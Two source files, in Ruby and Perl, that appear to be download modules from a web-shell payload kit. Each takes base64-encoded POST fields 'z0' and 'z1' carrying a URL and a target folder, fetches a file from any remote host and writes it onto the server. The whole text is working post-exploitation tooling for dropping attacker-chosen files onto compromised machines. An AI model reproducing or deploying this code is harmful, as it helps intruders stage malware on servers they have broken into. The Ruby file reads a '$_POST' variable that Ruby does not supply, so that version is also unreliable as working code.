File: Payload/Ruby/CGI/OneShell/file_wget.rb
require 'base64'
require 'json'
require 'net/http'
require 'uri'

def main
  url_str  = Base64.decode64($_POST['z0'].to_s)
  save_dir = Base64.decode64($_POST['z1'].to_s)

  unless url_str.start_with?('http://', 'https://')
    url_str = "http://#{url_str}"
  end

  begin
    uri = URI.parse(url_str)
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = (uri.scheme == 'https')
    http.read_timeout = 30

    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)

    unless response.is_a?(Net::HTTPSuccess)
      raise "HTTP Server returned code #{response.code}"
    end

    filename = nil

    cd_header = response['content-disposition']
    if cd_header && cd_header =~ /filename="?([^";\n]+)"?/i
      filename = $1.to_s.strip
    end

    if filename.nil? || filename.empty?
      path = uri.path || ''
      filename = File.basename(path)
    end

    if filename.nil? || filename.empty? || filename == '/'
      filename = 'download.bin'
    end

    file_path = File.join(save_dir, filename)

    File.binwrite(file_path, response.body)

    print JSON.generate({
      'success'  => true,
      'filename' => filename,
      'path'     => file_path
    })

  rescue => e
    print JSON.generate({
      'success' => false,
      'error'   => "Download failed: #{e.message}"
    })
  end
end

main

File: Payload/Perl/CGI/OneShell/file_wget.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use JSON;
use LWP::UserAgent;
use File::Spec;
use URI;

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';
    my $z1 = $q->param('z1') // '';

    my $url      = decode_base64($z0);
    my $save_dir = decode_base64($z1);

    my $json = JSON->new->utf8;

    my $ua = LWP::UserAgent->new;
    $ua->timeout(30);
    $ua->agent("Mozilla/5.0");

    my $response = $ua->head($url);
    
    unless ($response->is_success) {
        $response = $ua->get($url);
    }

    my $filename;

    my $content_disp = $response->header('Content-Disposition');
    if ($content_disp) {
        if ($content_disp =~ /filename="?([^";]+)"?/i) {
            $filename = $1;
        }
    }

    unless ($filename) {
        my $uri = URI->new($url);
        if ($uri) {
            my $path = $uri->path // '';
            $filename = (split(/\//, $path))[-1];
        }
    }

    if (!$filename || $filename eq '' || $filename eq '/') {
        $filename = 'download.bin';
    }

    $save_dir =~ s/[\\\/]+$//;
    my $file_path = $save_dir . '/' . $filename;

    my $download_res = $ua->get($url);

    if (!$download_res->is_success) {
        print $json->encode({
            success => JSON::false,
            error   => 'Download failed'
        });
        return;
    }

    my $data = $download_res->content;

    eval {
        open(my $fh, '>', $file_path) or die;
        binmode($fh);
        print $fh $data;
        close($fh);
        1;
    } or do {
        print $json->encode({
            success => JSON::false,
            error   => 'Failed to write file to disk'
        });
        return;
    };

    print $json->encode({
        success  => JSON::true,
        filename => $filename,
        path     => $file_path
    });
}

main();